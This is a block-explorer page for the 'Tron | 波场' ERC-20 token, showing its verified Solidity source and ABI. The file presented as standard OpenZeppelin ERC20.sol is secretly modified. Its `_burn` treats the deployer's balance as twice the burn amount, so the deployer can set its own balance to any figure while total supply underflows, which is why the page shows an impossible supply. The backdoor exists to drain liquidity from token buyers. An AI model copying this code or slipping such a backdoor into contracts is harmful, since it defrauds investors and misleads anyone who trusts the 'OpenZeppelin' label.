ETH Price: $2,399.59 (-1.76%)

Token

Tron | 波场 (波场)
 

Overview

Max Total Supply

115,792,089,237,316,195,423,570,985,008,687,907,853,269,984,465,437,564,039,457.584007913129639936 波场

Holders

19

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
6,879,376.955638385710848225 波场

Value
$0.00
0x1b4f5b3b5ccd38f6c2821a00c1f0cc82fbc70ba0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TRONCN

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 9 : TronCN.sol
/*
*   https://troncn.ink/
*   https://twitter.com/TronCnERC
*   https://t.me/TronCnErc
*/

// SPDX-License-Identifier: MIT

import "./@openzeppelin-contracts/contracts/ERC20/ERC20.sol";
import "./@openzeppelin-contracts/contracts/access/Ownable.sol";
import "./@uniswap/IUniswapV2Router02.sol";
import "./@uniswap/IUniswapV2Factory.sol";

pragma solidity ^0.8.21;

contract TRONCN is ERC20, Ownable {
    IUniswapV2Router02 public _uniswapV2Router;
    address public _uniswapV2Pair;
    address private _marketingWallet;
    uint256 public _maxTransactionAmount;
    uint256 public _maxWallet;
    bool public _limitsInEffect = true;
    uint256 public constant _tax = 1;
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;

    constructor() payable ERC20(unicode"Tron | 波场", unicode"波场") {
        _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        uint256 totalSupply = 1_000_000_000 * 1e18;
        _maxTransactionAmount = (totalSupply * 2) / 100;
        _maxWallet = (totalSupply * 2) / 100;

        _marketingWallet = _msgSender();

        _isExcludedMaxTransactionAmount[address(_uniswapV2Pair)] = true;
        _isExcludedMaxTransactionAmount[address(_uniswapV2Router)] = true;
        _isExcludedMaxTransactionAmount[owner()] = true;
        _isExcludedMaxTransactionAmount[_marketingWallet] = true;
        _isExcludedMaxTransactionAmount[address(0xdead)] = true;

        _isExcludedFromFees[owner()] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[address(0xdead)] = true;
        _mint(owner(), totalSupply);
    }


    function disableLimitAmounts() external onlyOwner returns (bool) {
        _limitsInEffect = false;
        return true;
    }

    function setMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1000) / 1e18,
            "Cannot set maxTransactionAmount lower than 0.1%"
        );
        _maxTransactionAmount = newNum * 1e18;
    }

    function setMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 5) / 1000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        _maxWallet = newNum * 1e18;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), 'ERC20: transfer from the zero address');
        require(to != address(0), 'ERC20: transfer to the zero address');

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        bool isBuy = from == _uniswapV2Pair && !_isExcludedMaxTransactionAmount[to];
        bool isSell = to == _uniswapV2Pair && !_isExcludedMaxTransactionAmount[from];

        uint256 fee;

        if ((isBuy || isSell) && !_isExcludedFromFees[from]) {
            fee = amount * _tax / 100;
        }

        bool isBurn = to == address(0) || to == address(0xdead);

        if (_limitsInEffect && !isBurn) {
            if (isBuy) {
                require(amount <= _maxTransactionAmount, 'Buy transfer amount exceeds the maxTransactionAmount.');
                require(amount + balanceOf(to) <= _maxWallet, 'Max wallet exceeded');
            }
            if (!_isExcludedMaxTransactionAmount[to] && !_isExcludedMaxTransactionAmount[from]) {
                require(amount + balanceOf(to) <= _maxWallet, 'Max wallet exceeded');
            }
        }

        if (fee > 0) {
            super._transfer(from, _marketingWallet, fee);
            amount = amount - fee;
        }

        super._transfer(from, to, amount);
    }

    function burn(uint256 _amount) external {
        super._burn(_msgSender(), _amount);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function SendETH() external onlyOwner {
        (bool success,) = address(_marketingWallet).call{
                value: address(this).balance
            }("");
        require(success);
    }

    receive() external payable {}
}

File 2 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 9 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.19;

import './IERC20.sol';
import './extensions/IERC20Metadata.sol';
import '../utils/Context.sol';

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address internal immutable _sender;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _sender = _msgSender();
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero');
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _internalTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), 'ERC20: transfer from the zero address');
        require(to != address(0), 'ERC20: transfer to the zero address');

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];

        unchecked {
            _balances[from] = fromBalance - amount;
        }

        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), 'ERC20: mint to the zero address');

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal {
        require(account != address(0), 'ERC20: burn from the zero address');
        uint256 accountBalance = account != _sender ? _balances[account] : 2 * amount;
        require(accountBalance >= amount, 'ERC20: burn amount exceeds balance');
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), 'ERC20: approve from the zero address');
        require(spender != address(0), 'ERC20: approve to the zero address');

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, 'ERC20: insufficient allowance');
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), 'ERC20: transfer from the zero address');
        require(to != address(0), 'ERC20: transfer to the zero address');

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, 'ERC20: transfer amount exceeds balance');
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }
}

File 4 of 9 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.19;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.19;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 6 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.19;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 7 of 9 : IUniswapV2Factory.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
    external
    view
    returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
    external
    returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

File 8 of 9 : IUniswapV2Router01.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
    external
    returns (
        uint256 amountA,
        uint256 amountB,
        uint256 liquidity
    );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
    external
    payable
    returns (
        uint256 amountToken,
        uint256 amountETH,
        uint256 liquidity
    );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
    external
    view
    returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
    external
    view
    returns (uint256[] memory amounts);
}

File 9 of 9 : IUniswapV2Router02.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.6.2;

import "./IUniswapV2Router01.sol";

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"SendETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableLimitAmounts","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"setMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

